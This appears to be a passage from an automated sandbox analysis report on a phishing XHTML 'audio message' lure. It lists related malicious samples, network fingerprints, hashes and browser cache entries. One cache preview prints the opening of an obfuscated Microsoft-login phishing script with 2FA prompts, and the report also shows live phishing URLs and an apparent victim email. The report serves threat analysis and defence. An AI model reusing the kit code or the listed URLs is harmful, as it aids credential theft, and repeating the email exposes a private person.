	arm7.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	mips.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	ARxx7NW.exe	Get hash	malicious	Xmrig	Browse	104.245.241.161
	.main.elf	Get hash	malicious	Xmrig	Browse	104.245.240.20
FASTLYUS	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.66.137
	25 03 2025 Legal Notice Presentation.pptx	Get hash	malicious	Unknown	Browse	151.101.2.132
	25 03 2025 Legal Notice Presentation.pptx	Get hash	malicious	Unknown	Browse	151.101.2.132
	http://nuhobarthouse.weebly.com	Get hash	malicious	Unknown	Browse	151.101.129.46
	4354_QB_Paymt_Statemnt.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.194.137
	https://app.kortex.co/public/document/8838161b-5f2e-4b7c-b66b-ddfd9db20ecd	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.192.176
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	https://bbw.name/t3t/out.php?url=https://gamma.app/docs/Bish-Enterprises-c602sxm5n81qwyl?mode=present#card-i5uz51lfyfocdyu	Get hash	malicious	HTMLPhisher	Browse	151.101.65.55
	Workspace Update.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
FASTLYUS	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.66.137
	25 03 2025 Legal Notice Presentation.pptx	Get hash	malicious	Unknown	Browse	151.101.2.132
	25 03 2025 Legal Notice Presentation.pptx	Get hash	malicious	Unknown	Browse	151.101.2.132
	http://nuhobarthouse.weebly.com	Get hash	malicious	Unknown	Browse	151.101.129.46
	4354_QB_Paymt_Statemnt.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.194.137
	https://app.kortex.co/public/document/8838161b-5f2e-4b7c-b66b-ddfd9db20ecd	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.192.176
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	https://bbw.name/t3t/out.php?url=https://gamma.app/docs/Bish-Enterprises-c602sxm5n81qwyl?mode=present#card-i5uz51lfyfocdyu	Get hash	malicious	HTMLPhisher	Browse	151.101.65.55
	Workspace Update.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX	Get hash	malicious	Unknown	Browse	204.79.197.222
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	204.79.197.222
	https://app.storylane.io/share/cllvhddxirl7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	204.79.197.222
	Legal_Notice_Presentation.pptx	Get hash	malicious	HTMLPhisher	Browse	204.79.197.222
	750413b4e6897a671bc759e04597952a0be747830189873b.bin.exe	Get hash	malicious	LummaC Stealer	Browse	204.79.197.222
	https://jainiklifesciences.com/proposals	Get hash	malicious	HTMLPhisher	Browse	204.79.197.222
	https://sallybarmescounsellor.co.uk/pad4.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	204.79.197.222
	http://hdm.bdienzelsex.com	Get hash	malicious	Unknown	Browse	204.79.197.222
	Bestellung Nr. 130-25105297.PDF.lnk.download.lnk	Get hash	malicious	Unknown	Browse	204.79.197.222
	2h.bat	Get hash	malicious	Unknown	Browse	204.79.197.222

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://i.imgur.com/KAb5SEy.png
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	21
Entropy (8bit):	3.463280517810811
Encrypted:	false
SSDEEP:	3:YMESl4n:YMEA4
MD5:	5FC0F7551D7401CCA01F4932344A252B
SHA1:	5713D2E3279812EC2B743C3E7A53C0F78312097E
SHA-256:	5E4D1A9C2B59CEF553795198E0704550644281A2597D270337902B70F13ABCCD
SHA-512:	52EA7017462F171050150C84341B9087339407B87B1E0D0406AFB4D3BB8097697802B71805E1B13AD53D1C2991098E3573485A481E86505B35BF9AF23B01DBB2
Malicious:	false
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"161.77.13.20"}

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
URL:	https://i.imgur.com/0HdPsKK.png
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894526489503226
Encrypted:	false
SSDEEP:	768:PO6TtTOT+Th6dO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaY:PO65yCYyB6F5/VW4HllbE
MD5:	95433AD6C822F912C3EC20D7D0324453
SHA1:	DD09149B83F227F46EBE417D5E55C25A8E5B718C
SHA-256:	3EAA119BDC8067E28626DD3E81A085ACF0F6C2EB6043DB1FEA164F5703CB5E71
SHA-512:	F20107C5DE6BFFB843CF3961EFEE83FCEB45F87DE204F53E55553342F959F23AED2A334B1C970E2B358CC7F1B72789EB84A6D05AD0E8C071B027168F62881D4F
Malicious:	false
URL:	https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.463280517810811
Encrypted:	false
SSDEEP:	3:YMESl4n:YMEA4
MD5:	5FC0F7551D7401CCA01F4932344A252B
SHA1:	5713D2E3279812EC2B743C3E7A53C0F78312097E
SHA-256:	5E4D1A9C2B59CEF553795198E0704550644281A2597D270337902B70F13ABCCD
SHA-512:	52EA7017462F171050150C84341B9087339407B87B1E0D0406AFB4D3BB8097697802B71805E1B13AD53D1C2991098E3573485A481E86505B35BF9AF23B01DBB2
Malicious:	false
Preview:	{"ip":"161.77.13.20"}

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.798154767744402
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml
File size:	2'938 bytes
MD5:	6d100346b0d3516c43b388901bac0fbc
SHA1:	0bb4ed60499d155aea77fb45b6965ce5b989dd66
SHA256:	3223e1c35cc26f15fc91336236f99193e65c4dae227be3d4acb64e993402c62a
